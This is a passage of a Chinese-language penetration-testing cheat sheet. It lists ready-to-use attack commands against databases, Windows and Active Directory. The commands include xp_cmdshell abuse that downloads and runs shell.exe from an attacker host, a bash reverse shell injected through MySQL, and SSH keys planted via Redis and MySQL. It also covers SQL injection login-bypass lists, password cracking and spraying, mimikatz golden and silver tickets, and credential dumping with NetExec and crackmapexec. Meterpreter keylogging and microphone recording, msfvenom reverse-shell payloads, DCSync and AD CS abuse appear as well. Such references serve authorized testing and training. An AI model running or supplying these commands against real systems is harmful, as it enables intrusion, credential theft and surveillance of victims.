SQL> SELECT name,sysadmin FROM syslogins;
SQL> SELECT srvname,isremote FROM sysservers;
SQL> EXEC ('SELECT current_user') at [<DOMAIN>\<CONFIG_FILE>];
SQL> EXEC ('SELECT srvname,isremote FROM sysservers') at [<DOMAIN>\<CONFIG_FILE>];
SQL> EXEC ('EXEC (''SELECT suser_name()'') at [<DOMAIN>\<CONFIG_FILE>]') at [<DOMAIN>\<CONFIG_FILE>];
执行XP_CMDSHELL攻击
1
2
3
4
5
6
SQL> EXEC sp_configure 'Show Advanced Options', 1;
SQL> reconfigure;
SQL> sp_configure;
SQL> EXEC sp_configure 'xp_cmdshell', 1;
SQL> reconfigure
SQL> xp_cmdshell "whoami"
1
2
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami
1
2
3
';EXEC master.dbo.xp_cmdshell 'ping <LHOST>';--
';EXEC master.dbo.xp_cmdshell 'certutil -urlcache -split -f http://<LHOST>/shell.exe C:\\Windows\temp\<FILE>.exe';--
';EXEC master.dbo.xp_cmdshell 'cmd /c C:\\Windows\\temp\\<FILE>.exe';--

MySQL数据库

1
2
mysql -u root -p
mysql -u <USERNAME> -h <RHOST> -p
1
2
3
4
5
6
7
mysql> show databases;
mysql> use <DATABASE>;
mysql> show tables;
mysql> describe <TABLE>;
mysql> SELECT * FROM Users;
mysql> SELECT * FROM users \G;
mysql> SELECT Username,Password FROM Users;
更新用户密码
1
mysql> update user set password = '37b08599d3f323491a66feabbb5b26af' where user_id = 1;
执行SHELL命令
1
mysql> \! /bin/sh
插入代码并执行
1
mysql> insert into users (id, email) values (<LPORT>, "- E $(bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1')");
将SSH密钥写入AUTHORIZED_KEYS2文件
1
mysql> SELECT "<KEY>" INTO OUTFILE '/root/.ssh/authorized_keys2' FIELDS TERMINATED BY '' OPTIONALLY ENCLOSED BY '' LINES TERMINATED BY '\n';

NoSQL注入

1
2
admin'||''==='
{"username": {"$ne": null}, "password": {"$ne": null} }

PostgreSQL数据库

1
2
3
4
psql
psql -h <LHOST> -U <USERNAME> -c "<COMMAND>;"
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>

常用命令-数据库

1
2
3
4
5
6
7
8
9
10
11
12
13
14
postgres=# \list                     // 列出所有数据库
postgres=# \c                        // 使用数据库
postgres=# \c <DATABASE>             // 使用特定数据库
postgres=# \s                        // 命令历史记录
postgres=# \q                        // quit
<DATABASE>=# \dt                     // 列出当前架构中的表
<DATABASE>=# \dt *.*                 // 列出所有架构中的表
<DATABASE>=# \du                     // 列出用户角色
<DATABASE>=# \du+                    // 列出用户角色
<DATABASE>=# SELECT user;            // 获取当前用户
<DATABASE>=# TABLE <TABLE>;          // 选择表格
<DATABASE>=# SELECT * FROM users;    // 从用户表中选择所有内容
<DATABASE>=# SHOW rds.extensions;    // 列出已安装的扩展
<DATABASE>=# SELECT usename, passwd from pg_shadow;    // 读取凭据

Redis数据库

1
2
3
4
5
6
7
8
9
10
11
12
13
> AUTH <PASSWORD>
> AUTH <USERNAME> <PASSWORD>
> INFO SERVER
> INFO keyspace
> CONFIG GET *
> SELECT <NUMBER>
> KEYS *
> HSET       // 如果哈希数据结构中的字段,则设置值
> HGET       // 从哈希数据结构中检索字段及其值
> HKEYS      // 从哈希数据结构中检索所有字段名
> HGETALL    // 从哈希数据结构中检索所有字段和值
> GET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b
> SET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b "username|s:8:\"<USERNAME>\";role|s:5:\"admin\";auth|s:4:\"True\";" # the value "s:8" has to match the length of the username
输入自己的 SSH 密钥
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
redis-cli -h <RHOST>
echo "FLUSHALL" | redis-cli -h <RHOST>
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /PATH/TO/FILE/<FILE>.txt
cat /PATH/TO/FILE/<FILE>.txt | redis-cli -h <RHOST> -x set s-key
<RHOST>:6379> get s-key
<RHOST>:6379> CONFIG GET dir
1) "dir"
2) "/var/lib/redis"
<RHOST>:6379> CONFIG SET dir /var/lib/redis/.ssh
OK
<RHOST>:6379> CONFIG SET dbfilename authorized_keys
OK
<RHOST>:6379> CONFIG GET dbfilename
1) "dbfilename"
2) "authorized_keys"
<RHOST>:6379> save
OK

SQL注入

主列表
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
';#---              // 到处插入!向xsudoxx大喊!
admin' or '1'='1
' or '1'='1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1 -
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1-
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1`='1-
身份验证绕过
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin';-- azer
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

SQL截断攻击

1
'admin@<FQDN>' = 'admin@<FQDN>++++++++++++++++++++++++++++++++++++++htb'

sqlite3数据库

1
sqlite3 <FILE>.db
1
2
3
sqlite> .tables
sqlite> PRAGMA table_info(<TABLE>);
sqlite> SELECT * FROM <TABLE>;

sqsh工具

1
2
3
sqsh -S <RHOST> -U <USERNAME>
sqsh -S '<RHOST>' -U '<USERNAME>' -P '<PASSWORD>'
sqsh -S '<RHOST>' -U '.\<USERNAME>' -P '<PASSWORD>'
使用 xp_dirtree 列出文件和文件夹
1
EXEC master.sys.xp_dirtree N'C:\inetpub\wwwroot\',1,1;

密码攻击

CRACKMAPEXEC

1
2
3
4
5
crackmapexec ldap -L
crackmapexec mysql -L
crackmapexec smb -L
crackmapexec ssh -L
crackmapexec winrm -L
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
crackmapexec smb <RHOST> -u '' -p '' --shares
crackmapexec smb <RHOST> -u '' -p '' --shares -M spider_plus
crackmapexec smb <RHOST> -u '' -p '' --shares -M spider_plus -o READ_ONLY=false
crackmapexec smb <RHOST> -u " " -p "" --shares
crackmapexec smb <RHOST> -u " " -p "" --shares -M spider_plus
crackmapexec smb <RHOST> -u " " -p "" --shares -M spider_plus -o READ_ONLY=false
crackmapexec smb <RHOST> -u guest -p '' --shares --rid-brute
crackmapexec smb <RHOST> -u guest -p '' --shares --rid-brute 100000
crackmapexec smb <RHOST> -u "guest" -p "" --shares --rid-brute
crackmapexec smb <RHOST> -u "guest" -p "" --shares --rid-brute 100000
crackmapexec ldap <RHOST> -u '' -p '' -M get-desc-users
crackmapexec smb <RHOST> -u "<USERNAME>" --use-kcache --sam
crackmapexec ldap <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --gmsa
crackmapexec ldap <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --gmsa -k
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --shares
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --sam
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --lsa
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --dpapi
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --local-auth --sam
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --local-auth --lsa
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --local-auth --dpapi
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" -M lsassy
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --ntds
crackmapexec smb <RHOST> -u "<USERNAME>" -H "<NTLMHASH>" --ntds
crackmapexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --ntds --user <USERNAME>
crackmapexec smb <RHOST> -u "<USERNAME>" -H "<NTLMHASH>" --ntds --user <USERNAME>
crackmapexec smb <RHOST> -u "<USERNAME>" -H <HASH> -x "whoami"
crackmapexec winrm <SUBNET>/24 -u "<USERNAME>" -p "<PASSWORD>" -d .
crackmapexec winrm -u /t -p "<PASSWORD>" -d <DOMAIN> <RHOST>
crackmapexec winrm <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt
crackmapexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --shares
crackmapexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --pass-pol
crackmapexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --lusers
crackmapexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --sam
crackmapexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt -x 'net user Administrator /domain' --exec-method smbexec
crackmapexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --wdigest enable
crackmapexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt -x 'quser'

FCRACK 工具

1
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <FILE>.zip

组策略首选项 (GPP)

GPP解密
1
2
python3 gpp-decrypt.py -f Groups.xml
python3 gpp-decrypt.py -c edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

哈希猫 - HASHCAT

https://hashcat.net/hashcat/

https://hashcat.net/wiki/doku.php?id=hashcat

https://hashcat.net/cap2hashcat/

https://hashcat.net/wiki/doku.php?id=example_hashes

1
2
hashcat --example-hashes
hashcat --help | grep -i "ntlm"
1
2
3
4
5
6
7
8
9
10
hashcat -m 0 md5 /usr/share/wordlists/rockyou.txt
hashcat -m 100 sha-1 /usr/share/wordlists/rockyou.txt
hashcat -m 1400 sha256 /usr/share/wordlists/rockyou.txt
hashcat -m 3200 bcrypt /usr/share/wordlists/rockyou.txt
hashcat -m 900 md4 /usr/share/wordlists/rockyou.txt
hashcat -m 1000 ntlm /usr/share/wordlists/rockyou.txt
hashcat -m 1800 sha512 /usr/share/wordlists/rockyou.txt
hashcat -m 160 hmac-sha1 /usr/share/wordlists/rockyou.txt
hashcat -a 0 -m 0 hash.txt SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -O --force
hashcat -O -m 500 -a 3 -1 ?l -2 ?d -3 ?u  --force hash.txt ?3?3?1?1?1?1?2?3
破解 ASPREPRoast 密码文件
1
hashcat -m 18200 -a 0 <FILE> <FILE>
破解 Kerberoasting 密码文件
1
hashcat -m 13100 --force <FILE> <FILE>
基于模式的暴力破解
1
hashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout
生成候选密码:单词列表+模式
1
hashcat -a6 -m0 "e99a18c428cb38d5f260853678922e03" yourPassword|/usr/share/wordlists/rockyou.txt ?d?d?d?u?u?u --force --potfile-disable --stdout
使用internalMonologue生成NetNLTMv2并使用hashcat破解
1
InternalMonologue.exe -Downgrade False -Restore False -Impersonate True -Verbose False -challange 002233445566778888800
结果
1
spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000
用hashcat破解
1
hashcat -m5600 'spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000' -a 3 /usr/share/wordlists/rockyou.txt --force --potfile-disable
规则

https://github.com/NotSoSecure/password_cracking_rules/blob/master/OneRuleToRuleThemAll.rule

使用 OneRuleToRuleThemAll.rule 进行破解
1
hashcat -m 3200 hash.txt -r /PATH/TO/FILE.rule

九头蛇 - hydra

1
2
3
hydra <RHOST> -l <USERNAME> -p <PASSWORD> <PROTOCOL>
hydra <RHOST> -L /PATH/TO/WORDLIST/<FILE> -P /PATH/TO/WORDLIST/<FILE> <PROTOCOL>
hydra <RHOST> -C /PATH/TO/WORDLIST/<FILE> ftp
1
2
export HYDRA_PROXY=connect://127.0.0.1:8080
unset HYDRA_PROXY
1
2
3
4
5
6
7
8
9
hydra <RHOST> -l <USERNAME> -P /PATH/TO/WORDLIST/<FILE> http-post-form "/admin.php:username=^USER^&password=^PASS^:login_error"

hydra <RHOST> -l <USERNAME> -P /PATH/TO/WORDLIST/<FILE> http-post-form "/index.php:username=user&password=^PASS^:Login failed. Invalid"

hydra <RHOST> -L /PATH/TO/WORDLIST/<FILE> -P /PATH/TO/WORDLIST/<FILE> http-post-form "/login:usernameField=^USER^&passwordField=^PASS^:unsuccessfulMessage" -s <RPORT>

hydra <RHOST> -l root@localhost -P otrs-cewl.txt http-form-post "/otrs/index.pl:Action=Login&RequestedURL=Action=Admin&User=root@localhost&Password=^PASS^:Login failed" -vV -f

hydra <RHOST> -l admin -P /PATH/TO/WORDLIST/<FILE> http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1&__EVENTVALIDATION=COOKIE_2&UserName=^USER^&Password=^PASS^&LoginButton=Log+in:Login failed"

约翰 - john

1
2
3
4
/usr/share/john/ssh2john.py id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt <FILE>
john --rules --wordlist=/usr/share/wordlists/rockyou.txt <FILE>
john --show <FILE>

kerbrute - 域环境爆破工具

用户枚举
1
./kerbrute userenum -d <DOMAIN> --dc <DOMAIN> /PATH/TO/FILE/<USERNAMES>
密码喷洒
1
./kerbrute passwordspray -d <DOMAIN> --dc <DOMAIN> /PATH/TO/FILE/<USERNAMES> <PASSWORD>

lazagne.exe

1
laZagne.exe all

mimikatz.exe - 猕猴桃

常用命令
1
2
3
4
5
6
7
8
token::elevate
token::revert
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
lsadump::dcsync /<USERNAME>:<DOMAIN>\krbtgt /domain:<DOMAIN>
转储 Hashes
1
2
3
4
5
6
.\mimikatz.exe
sekurlsa::minidump /users/admin/Desktop/lsass.DMP
sekurlsa::LogonPasswords
meterpreter > getprivs
meterpreter > creds_all
meterpreter > golden_ticket_create
制作白银票据
1
2
3
4
5
.\mimikatz.exe
sekurlsa::tickets /export
kerberos::ptt [0;76126]-2-0-40e10000-Administrator@krbtgt-<RHOST>.LOCAL.kirbi
klist
dir \\<RHOST>\admin$
制作黄金票据
1
2
3
4
5
6
7
.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
misc::cmd
klist
dir \\<RHOST>\admin$
万能钥匙
1
2
3
4
privilege::debug
misc::skeleton
net use C:\\<RHOST>\admin$ /user:Administrator mimikatz
dir \\<RHOST>\c$ /user:<USERNAME> mimikatz

NetExec工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
netexec smb <RHOST> -u '' -p '' --shares
netexec smb <RHOST> -u '' -p '' --shares -M spider_plus
netexec smb <RHOST> -u '' -p '' --shares -M spider_plus -o READ_ONLY=false
netexec smb <RHOST> -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=True
netexec smb <RHOST> -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=True MAX_FILE_SIZE=99999999
netexec smb <RHOST> -u " " -p "" --shares
netexec smb <RHOST> -u " " -p "" --shares -M spider_plus
netexec smb <RHOST> -u " " -p "" --shares -M spider_plus -o READ_ONLY=false
netexec smb <RHOST> -u " " -p "" --shares -M spider_plus -o DOWNLOAD_FLAG=True
netexec smb <RHOST> -u " " -p "" --shares -M spider_plus -o DOWNLOAD_FLAG=True MAX_FILE_SIZE=99999999
netexec smb <RHOST> -u guest -p '' --shares --rid-brute
netexec smb <RHOST> -u guest -p '' --shares --rid-brute 100000
netexec smb <RHOST> -u "guest" -p "" --shares --rid-brute
netexec smb <RHOST> -u "guest" -p "" --shares --rid-brute 100000
netexec smb <RHOST> -u "<USERNAME>" --use-kcache --sam
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --shares
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --sam
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --lsa
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --dpapi
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --local-auth --sam
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --local-auth --lsa
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --local-auth --dpapi
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" -M lsassy
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" -M web_delivery -o URL=http://<LHOST>/<FILE>
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --ntds
netexec smb <RHOST> -u "<USERNAME>" -H "<NTLMHASH>" --ntds
netexec smb <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --ntds --user <USERNAME>
netexec smb <RHOST> -u "<USERNAME>" -H "<NTLMHASH>" --ntds --user <USERNAME>
netexec smb <RHOST> -u "<USERNAME>" -H <HASH> -x "whoami"
netexec ldap <RHOST> -u '' -p '' -M get-desc-users
netexec ldap <RHOST> -u "" -p "" -M get-desc-users
netexec ldap <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --gmsa
netexec ldap <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --gmsa -k
netexec ldap <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --bloodhound -ns <RHOST> -c all
netexec ldap <RHOST> -u "<USERNAME>" -p "<PASSWORD>" --bloodhound -ns <RHOST> -c all
netexec winrm <SUBNET>/24 -u "<USERNAME>" -p "<PASSWORD>" -d .
netexec winrm -u /t -p "<PASSWORD>" -d <DOMAIN> <RHOST>
netexec winrm <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt
netexec winrm <RHOST> -u '<USERNAME>' -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --shares
netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --pass-pol
netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --lusers
netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --sam
netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt -x 'net user Administrator /domain' --exec-method smbexec
netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --wdigest enable
netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt -x 'quser'

pypykatz

1
2
pypykatz lsa minidump lsass.dmp
pypykatz registry --sam sam system

漏洞利用工具

msfasploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
$ sudo msfdb run                   // start database
$ sudo msfdb init                  // 数据库初始化
$ msfdb --use-defaults delete      // 删除现有数据库
$ msfdb --use-defaults init        // 数据库初始化
$ msfdb status                     // database status
msf6 > workspace                   // metasploit工作空间
msf6 > workspace -a <WORKSPACE>    // add a workspace
msf6 > workspace -r <WORKSPACE>    // rename a workspace
msf6 > workspace -d <WORKSPACE>    // delete a workspace
msf6 > workspace -D                // delete all workspaces
msf6 > db_nmap <OPTIONS>           // 执行nmap并将输出添加到数据库
msf6 > hosts                       // reads hosts from database
msf6 > services                    // reads services from database
msf6 > vulns                       // 显示漏洞
msf6 > search                      // search within metasploit
msf6 > set RHOST <RHOST>           // set remote host
msf6 > set RPORT <RPORT>           // set remote port
msf6 > run                         // run exploit
msf6 > spool /PATH/TO/FILE         // 记录屏幕输出
msf6 > save                        // saves current state
msf6 > exploit                     // using module exploit
msf6 > payload                     // using module payload
msf6 > auxiliary                   // using module auxiliary
msf6 > encoder                     // using module encoder
msf6 > nop                         // using module nop
msf6 > show sessions               // 显示所有当前会话
msf6 > sessions -i 1               // switch to session 1
msf6 > sessions -u <ID>            // 将shell升级为meterpreter
msf6 > sessions -k <ID>            // 终止特定会话
msf6 > sessions -K                 // kill all sessions
msf6 > jobs                        // 显示所有当前作业
msf6 > show payloads               // 显示可用有效载荷
msf6 > set VERBOSE true            // 启用详细输出
msf6 > set forceexploit true       // 无论如何都会利用目标
msf6 > set EXITFUNC thread         // 反向shell可以在不退出程序的情况下退出
msf6 > set AutoLoadStdapi false    // 禁用stdapi的自动加载
msf6 > set PrependMigrate true     // 启用自动进程迁移
msf6 > set PrependMigrateProc explorer.exe                        // 自动迁移到explorer.exe
msf6 > use post/PATH/TO/MODULE                                    // use post exploitation module
msf6 > use post/linux/gather/hashdump                             // use hashdump for Linux
msf6 > use post/multi/manage/shell_to_meterpreter                 // shell to meterpreter
msf6 > use exploit/windows/http/oracle_event_processing_upload    // 使用特定模块
C:\> > Ctrl + z                                  // 将活动meterpreter外壳置于背景中
meterpreter > loadstdapi                         // 加载stdapi
meterpreter > background                         // 将meterpreter置于后台(与“bg”相同)
meterpreter > shell                              // get a system shell
meterpreter > channel -i <ID>                    // 返回到现有的meterpreter外壳
meterpreter > ps                                 // 检查过程
meterpreter > migrate 2236                       // 迁移到进程
meterpreter > getuid                             // get the user id
meterpreter > sysinfo                            // get system information
meterpreter > search -f <FILE>                   // search for a file
meterpreter > upload                             // 将本地文件上载到目标
meterpreter > ipconfig                           // 获取网络配置
meterpreter > load powershell                    // loads powershell
meterpreter > powershell_shell                   // load powershell的后续命令
meterpreter > powershell_execute                 // execute命令
meterpreter > powershell_import                  // import module
meterpreter > powershell_shell                   // shell
meterpreter > powershell_session_remove          // remove
meterpreter > powershell_execute 'Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress'                                // network discovery
meterpreter > powershell_execute '1..254 | foreach { "<XXX.XXX.XXX>.${_}: $(Test-Connection -TimeoutSeconds 1 -Count 1 -ComputerName <XXX.XXX.XXX>.${_} -Quiet)" }'    // network scan
meterpreter > powershell_execute 'Test-NetConnection -ComputerName <RHOST> -Port 80 | Select-Object -Property RemotePort, TcpTestSucceeded'                            // port scan
meterpreter > load kiwi                          // load mimikatz
meterpreter > help kiwi                          // mimikatz help
meterpreter > kiwi_cmd                           // execute mimikatz native command
meterpreter > lsa_dump_sam                       // lsa sam dump
meterpreter > dcsync_ntlm krbtgt                 // dc sync
meterpreter > creds_all                          // dump all credentials
meterpreter > creds_msv                          // msv dump
meterpreter > creds_kerberos                     // kerberos dump
meterpreter > creds_ssp                          // ssp dump
meterpreter > creds_wdigest                      // wdigest dump
meterpreter > getprivs                           // 加载mimikatz后获得特权
meterpreter > getsystem                          // 如果用户是管理员组的成员,则获得系统权限
meterpreter > hashdump                           // dumps all the user hashes
meterpreter > run post/windows/gather/checkvm    // check status of the target
meterpreter > run post/multi/recon/local_exploit_suggester    // checking for exploits
meterpreter > run post/windows/manage/enable_rdp              // enables rdp
meterpreter > run post/multi/manage/autoroute                 // runs autoroutes
meterpreter > run auxiliary/server/socks4a                    // runs socks4 proxy server
meterpreter > keyscan_start                                   // enabled keylogger
meterpreter > keyscan_dump                                    // showing the output
meterpreter > screenshare                                     // realtime screen sharing
meterpreter > screenshare -q 100                              // realtime screen sharing
meterpreter > record_mic                                      // recording mic output
meterpreter > timestomp                                       // modify timestamps
meterpreter > execute -f calc.exe                             // starts a program on the victim
meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1    // port forwarding
通过代理服务器登录METASPLOIT工具
1
proxychains -q msfconsole
辅助输出目录
1
/home/<USERNAME>/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt
Meterpreter监听器
生成有效负载
1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe
为 Microsoft Windows 设置监听器
1
2
3
4
5
6
7
8
9
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
下载文件
1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>.exe
1
2
3
4
5
6
7
8
9
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
1
.\<FILE>.exe
1
meterpreter > download *

域环境或内网环境的后利用技巧

账户操作员小组成员资格

添加用户
1
2
net user <USERNAME> <PASSWORD> /add /domain
net group "Exchange Windows Permissions" /add <USERNAME>
导入PowerView
1
2
powershell -ep bypass
. .\PowerView.ps1
添加 DCSync 权限
1
2
3
$pass = convertto-securestring '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=<DOMAIN>,DC=local" -PrincipalIdentity <USERNAME> -Rights DCSync
DCSync
1
impacket-secretsdump '<USERNAME>:<PASSWORD>@<RHOST>'

Active Directory 证书服务 (AD CS)

1
certipy find -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -vulnerable -stdout
ESC1:证书模板配置错误
1
2
certipy req -ca '<CA>' -username <USERNAME>@<DOMAIN> -password <PASSWORD> -target <CA> -template <TEMPLATE> -upn administrator@<DOMAIN> -dns <RHOST>
certipy auth -pfx administrator.pfx -dc-ip <RHOST>
ESC2:证书模板配置错误
1
2
3
